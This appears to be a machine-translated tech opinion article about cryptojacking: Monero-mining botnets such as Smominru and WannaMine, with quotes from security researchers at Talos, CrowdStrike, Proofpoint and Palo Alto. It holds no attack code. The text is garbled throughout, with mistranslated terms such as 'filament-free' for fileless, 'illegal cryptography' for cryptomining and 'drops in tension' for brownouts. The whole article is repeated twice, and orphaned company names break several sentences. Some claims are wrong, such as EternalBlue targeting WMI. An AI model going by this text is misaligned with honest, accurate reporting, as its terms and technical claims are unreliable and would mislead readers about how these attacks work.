The ransomware is oh, so 2017. Today all the clever hackers have turned to illicit cryptomining to fill their coffers.
Because of the combination of a leaked NSA trap, a more anonymous Bitcoin cryptocurrency and a benign cryptocurrency transaction processing software (known as "mining") that does not require any command and control linking to the attacker, we now have the perfect combination of easy money, minimum detection possibilities, and billions of unsuspecting targets that may not even bother you have been violated.
Criminals from all over the world rejoice, still incredulous of how easy it is to make money while they sleep.
Assemble the pieces of the "perfect crime"
In early 2017, a group of hackers released in nature a number of hacks created by the NSA, including EternalBlue, which made it easy to open.
Microsoft
Meanwhile, supporters of cryptocurrency dissatisfied with the lack of true anonymity of Bitcoin have developed Monero, an altcoin better able to hide traces of criminal transactions. Guess what? The criminals love it.
The third component of its nefarious business: the fact that all blockchain-based systems exploit distributed transaction processors known as miners, who automatically receive a payment for their efforts in any cryptocurrency they choose to process.
Sulfur – saltpeter – charcoal – and bam! The global hacker community has just invented gunpowder: the ability to illegally install illicit Monero miners on unsuspecting computers around the world.
Windows Servers Laptops. Android devices. Also the IoT endpoints. Everybody makes money for the bad guys every minute, day and night – all the bad guys, in fact, but especially the Russian and Chinese organized crime syndicates.
And maybe you have no idea that you've been hacked, apart from the occasional slowdowns in performance and the higher electricity bills. No ransom note. No stolen password files or credit card numbers. You may not even be able to convince someone that there is a problem.
Unravel the threat
The most pernicious aspect of illicit cryptomining is the way it flies under the radar of its victims. "In this new business model, attackers no longer penalize victims for opening an attachment, nor execute a malicious script by taking systems hostage and demanding redemption" explain Nick Biasini, Outreach Engineer; Edmund Brumaghin, threat researcher; Warren Mercer, chief technician; Josh Reynolds, information security analyst; Azim Khodijbaev, Senior Threat Intelligence Analyst; and David Liebenberg, Senior Threat Analyst; all at
Cisco systems
This attack vector is profitable and easy to assemble, a dangerous combination. "The increase in purchasing power and liquidity is driving valuations, as well as volatility, higher than ever" to say Ryan McCombs, Senior Consultant; Jason Barnes, senior consultant; Karan Sood, Senior Security Researcher; and Ian Barton, consultant; all a
CrowdStrike
As a result, illicit cryptomining is rapidly replacing ransomware as an attack choice vector, especially as cybersecurity vendors bring ransomware protection to market. "What we are observing from a near and potentially long-term perspective is the value of a computer that has only a normal old CPU could be more simply let some cryptocurrency miner run quietly instead of infecting it with ransomware or some other software that could steal data " explains Ryan Olson, Intelligence Director at Palo Alto Networks.
Build a botnet
A large number of compromised systems working in concert known as botnets they are a common hacker tool, as they can mount distributed denial of service attacks and various other attacks that require huge amounts of coordinated transaction processing.
In the case of illicit cryptomining, however, each node operates independently of the others. Criminals simply need to install many miners because each miner generates only a relatively small amount of money. "Talos has observed botnets made up of millions of infected systems, which … means that these systems could be exploited to theoretically generate over $ 100 million in the year," continues the Talos team. "All of this has been done with minimal effort after the initial infection – more importantly, with little chance of being detected, this revenue stream can continue forever."
In fact, there are several exploits that lead to different families of botnets. Perhaps the most pernicious has been nicknamed Smominru. "Proofpoint researchers monitored the massive Smominru botnet, whose combined computing power has earned millions of dollars for its operators" explains Sandiford Oliver, Cybersecurity Researcher for Proofpoint, which follows the pseudonym of Kafeine. "Given the huge profits available to botnet operators and the resilience of the botnet and its infrastructure, we expect these activities to continue, along with their potential impact on infected nodes. "
Smominru exploits the EternalBlue exploit of the NSA that targets Windows Management Infrastructure (WMI). Typically, the attacker performs a phishing attack with a Microsoft Word file attachment. Once the target downloads the file, it runs a Word macro that runs a Visual Basic script that in turn runs a Microsoft PowerShell script that downloads and installs the miner's executable.
Another popular encrypted worm that exploits WMI's weaknesses is WannaMine. "CrowdStrike has observed more sophisticated features built into a cryptographic worm called WannaMine, "says the CrowdStrike team." Its filament-free nature and the use of legitimate system software such as WMI and PowerShell make it difficult, if not impossible, to organizations block it without some form of next-generation antivirus. "
WMI, however, is not the only vulnerability. Some researchers report attacks via Microsoft SQL Server e
Oracle
Google
Show me the money
The keystone that holds the entire nefarious company together is the anonymous Monero cryptocurrency. "Bitcoin alternatives like Monero and Ethereum continue their general upward trend, "continues Oliver," placing them in the crosshairs of the threat actors in search of fast profits and anonymous transactions. "
While other cryptocurrencies play a role, Monero promises to be the favorite. "This Monero mining botnet is extremely large, consisting mainly of Microsoft Windows servers spread all over the world" He says Kevin Epstein, vice president of the Proofpoint threat center. "We repeatedly see the threat actors" follow the money "- in recent months, the money has been in cryptocurrency and the actors are turning their attention to a variety of illicit means to get both Bitcoin and alternatives."
Oliver makes this point. "In the last year, we have observed that stand-alone coin miners and coin-mining modules in existing malware proliferate rapidly," he says. "Since Bitcoin has become prohibitive for resources to be eradicated outside dedicated mines, Monero's interest has increased dramatically."
The combination of simple botnets and anonymous cryptocurrency has led to an explosion of illicit activities. "The payloads of cryptocurrency miners may be among the easiest money creators available to attackers," adds the Talos team. "There is no need to try to compromise hosts to steal documents, passwords, wallets, private keys, as we have become accustomed to seeing from financially motivated attackers."
Fly under the radar
In contrast to the direct assault on the ransomware that plagues the business, illegal cryptography is decidedly benign. "It's largely unnoticed by most users," says the Talos team. "There is no command and control activity and generates revenue consistently until it is removed."
Command and control is a term for the way hackers have to "call home" once they find their goal to exfiltrate goods – a step that is no longer necessary in the event of illicit cryptomining. The miner software simply needs to have the anonymous code representing the attacker's cryptowallet.
What, in reality, is stolen? "The attackers do not steal anything more than the computing power of their victims, and the data mining software is not technically malware," continues the Talos team. "In theory, victims could remain part of the opponent's botnet until the attacker chooses".
However, the theft of computing power (and its required electricity) is not entirely benign. "While cryptocurrency mining was generally viewed as a nuisance, CrowdStrike has recently seen several cases where mining has had an impact on corporate operations," adds the CrowdStrike team, "making some companies unable to operate for days and weeks at a time ".
Proofpoint is an agreement. "Since most of the nodes in this botnet seem to be Windows servers, the impact on the performance of a potentially critical business infrastructure could be high, as well as the cost of much more server power usage. closer to capacity, "says Oliver.
The future of illegal cryptography
While the fact that this cybernetic attack flies under the radar may seem benevolent, it is actually the reason why this attack strategy is so dangerous. Unlike ransomware, where companies require fast mitigation technology from software vendors, with illegal encryption, attacks will be able to spread mostly without control.
Over time, we can therefore expect compromised systems to escape making money for criminals to reach epidemic proportions. At one point, the criminals will always move forward each other, with more malicious actors trying to infect the same systems.
At that point, expect to see widespread "drops in tension" on computing power, as large areas of global computing infrastructure collapse under the weight of multiple botnets, each of which builds the respective fortunes of criminal businesses around the world. .
This problem is so pernicious, in fact, that software mitigation techniques could prove insufficient to stop its spread. Instead, governments may simply have to unplug from the cryptocurrency once and for all.
Intellyx publishes the Agile Digital Transformation Roadmap posters, advises companies on their digital transformation initiatives and helps sellers communicate their stories of agility. At the time of writing, Microsoft is an Intellyx customer. None of the other organizations mentioned in this article are Intellyx customers. Image credit: public domain.
">
The ransomware is oh, so 2017. Today all the clever hackers have turned to illicit cryptomining to fill their coffers.
Because of the combination of a leaked NSA trap, a more anonymous Bitcoin cryptocurrency and a benign cryptocurrency transaction processing software (known as "mining") that does not require any command and control linking to the attacker, we now have the perfect combination of easy money, minimum detection possibilities, and billions of unsuspecting targets that may not even bother you have been violated.
Criminals from all over the world rejoice, still incredulous of how easy it is to make money while they sleep.
Assemble the pieces of the "perfect crime"
In early 2017, a group of hackers released in nature a number of hacks created by the NSA, including EternalBlue, which made it easy to open.
Meanwhile, supporters of cryptocurrency dissatisfied with the lack of true anonymity of Bitcoin have developed Monero, an altcoin better able to hide traces of criminal transactions. Guess what? The criminals love it.
The third component of its nefarious business: the fact that all blockchain-based systems exploit distributed transaction processors known as miners, who automatically receive a payment for their efforts in any cryptocurrency they choose to process.
Sulfur – saltpeter – charcoal – and bam! The global hacker community has just invented gunpowder: the ability to illegally install illicit Monero miners on unsuspecting computers around the world.
Windows Servers Laptops. Android devices. Also the IoT endpoints. Everybody makes money for the bad guys every minute, day and night – all the bad guys, in fact, but especially the Russian and Chinese organized crime syndicates.
And maybe you have no idea that you've been hacked, apart from the occasional slowdowns in performance and the higher electricity bills. No ransom note. No stolen password files or credit card numbers. You may not even be able to convince someone that there is a problem.
Unravel the threat
The most pernicious aspect of illicit cryptomining is the way it flies under the radar of its victims. "In this new business model, attackers no longer penalize victims for opening an attachment, nor run a malicious script by taking systems hostage and demanding redemption," explains Nick Biasini, Outreach Engineer; Edmund Brumaghin, threat researcher; Warren Mercer, chief technician; Josh Reynolds, information security analyst; Azim Khodijbaev, Senior Threat Intelligence Analyst; and David Liebenberg, Senior Threat Analyst; all at
This attack vector is profitable and easy to assemble, a dangerous combination. "The increase in purchasing power and liquidity is driving valuations, in addition to volatility, higher than ever", they say Ryan McCombs, Senior Consultant; Jason Barnes, senior consultant; Karan Sood, Senior Security Researcher; and Ian Barton, consultant; all a
As a result, illicit cryptomining is rapidly replacing ransomware as an attack choice vector, especially as cybersecurity vendors bring ransomware protection to market. "What we are observing from a near and potentially long-term perspective is the value of a computer that has only a normal old CPU could be more simply to leave some cryptocurrency miner quietly running instead of infecting it with ransomware or some other software could steal data ", explains Ryan Olson, Intelligence Director of Palo Alto Networks.
Build a botnet
A large number of compromised systems working in concert known as botnets they are a common hacker tool, as they can mount distributed denial of service attacks and various other attacks that require huge amounts of coordinated transaction processing.
In the case of illicit cryptomining, however, each node operates independently of the others. Criminals simply need to install many miners because each miner generates only a relatively small amount of money. "Talos has observed botnets made up of millions of infected systems, which … means that these systems could be exploited to theoretically generate over $ 100 million in the year," continues the Talos team. "All of this has been done with minimal effort after the initial infection – more importantly, with little chance of being detected, this revenue stream can continue forever."
In fact, there are several exploits that lead to different families of botnets. Perhaps the most pernicious has been nicknamed Smominru. "The Proofpoint researchers monitored the massive Smominru botnet, whose combined computing power has earned millions of dollars for its operators," says Sandiford Oliver. Cybersecurity Researcher for Proofpoint, which follows the pseudonym of Kafeine. "Given the huge profits available to botnet operators and the resilience of the botnet and its infrastructure, we expect these activities to continue, along with their potential impact on infected nodes. "
Smominru exploits the EternalBlue exploit of the NSA that targets Windows Management Infrastructure (WMI). Typically, the attacker performs a phishing attack with a Microsoft Word file attachment. Once the target downloads the file, it runs a Word macro that runs a Visual Basic script that in turn runs a Microsoft PowerShell script that downloads and installs the miner's executable.
Another popular encrypted worm that exploits WMI's weaknesses is WannaMine. "CrowdStrike has observed more sophisticated features built into a cryptographic worm called WannaMine, "says the CrowdStrike team." Its filament-free nature and the use of legitimate system software such as WMI and PowerShell make it difficult, if not impossible, to organizations block it without some form of next-generation antivirus. "
WMI, however, is not the only vulnerability. Some researchers report attacks via Microsoft SQL Server e
Show me the money
The keystone that holds the entire nefarious company together is the anonymous Monero cryptocurrency. "Bitcoin alternatives like Monero and Ethereum continue their general upward trend, "continues Oliver," placing them in the crosshairs of the threat actors in search of fast profits and anonymous transactions. "
While other cryptocurrencies play a role, Monero promises to be the favorite. "This Monero mining botnet is extremely large, consisting primarily of Microsoft Windows servers spread all over the world," says Kevin Epstein, VP of Proofpoint's Threat Operations Center. "We repeatedly see the threat actors" follow the money "- in recent months, the money has been in cryptocurrency and the actors are turning their attention to a variety of illicit means to get both Bitcoin and alternatives."
Oliver makes this point. "In the last year, we have observed that stand-alone coin miners and coin-mining modules in existing malware proliferate rapidly," he says. "Since Bitcoin has become prohibitive for resources to be eradicated outside dedicated mines, Monero's interest has increased dramatically."
The combination of simple botnets and anonymous cryptocurrency has led to an explosion of illicit activities. "The payloads of cryptocurrency miners may be among the easiest money creators available to attackers," adds the Talos team. "There is no need to try to compromise hosts to steal documents, passwords, wallets, private keys, as we have become accustomed to seeing from financially motivated attackers."
Fly under the radar
In contrast to the direct assault on the ransomware that plagues the business, illegal cryptography is decidedly benign. "It's largely unnoticed by most users," says the Talos team. "There is no command and control activity and generates revenue consistently until it is removed."
Command and control is a term for the way hackers have to "call home" once they find their goal to exfiltrate goods – a step that is no longer necessary in the event of illicit cryptomining. The miner software simply needs to have the anonymous code representing the attacker's cryptowallet.
What, in reality, is stolen? "The attackers do not steal anything more than the computing power of their victims, and the data mining software is not technically malware," continues the Talos team. "In theory, victims could remain part of the opponent's botnet until the attacker chooses".
However, the theft of computing power (and its required electricity) is not entirely benign. "While cryptocurrency mining was generally viewed as a nuisance, CrowdStrike has recently seen several cases where mining has had an impact on corporate operations," adds the CrowdStrike team, "making some companies unable to operate for days and weeks at a time ".
Proofpoint is an agreement. "Since most of the nodes in this botnet seem to be Windows servers, the impact on the performance of a potentially critical business infrastructure could be high, as well as the cost of much more server power usage. closer to capacity, "says Oliver.
The future of illegal cryptography
While the fact that this cybernetic attack flies under the radar may seem benevolent, it is actually the reason why this attack strategy is so dangerous. Unlike ransomware, where companies require fast mitigation technology from software vendors, with illegal encryption, attacks will be able to spread mostly without control.
Over time, we can therefore expect compromised systems to escape making money for criminals to reach epidemic proportions. At one point, the criminals will always move forward each other, with more malicious actors trying to infect the same systems.
At that point, expect to see widespread "drops in tension" on computing power, as large areas of global computing infrastructure collapse under the weight of multiple botnets, each of which builds the respective fortunes of criminal businesses around the world. .
This problem is so pernicious, in fact, that software mitigation techniques could prove insufficient to stop its spread. Instead, governments may simply have to unplug from the cryptocurrency once and for all.
Intellyx publishes the Agile Digital Transformation Roadmap posters, advises companies on their digital transformation initiatives and helps sellers communicate their stories of agility. At the time of writing, Microsoft is an Intellyx customer. None of the other organizations mentioned in this article are Intellyx customers. Image credit: public domain.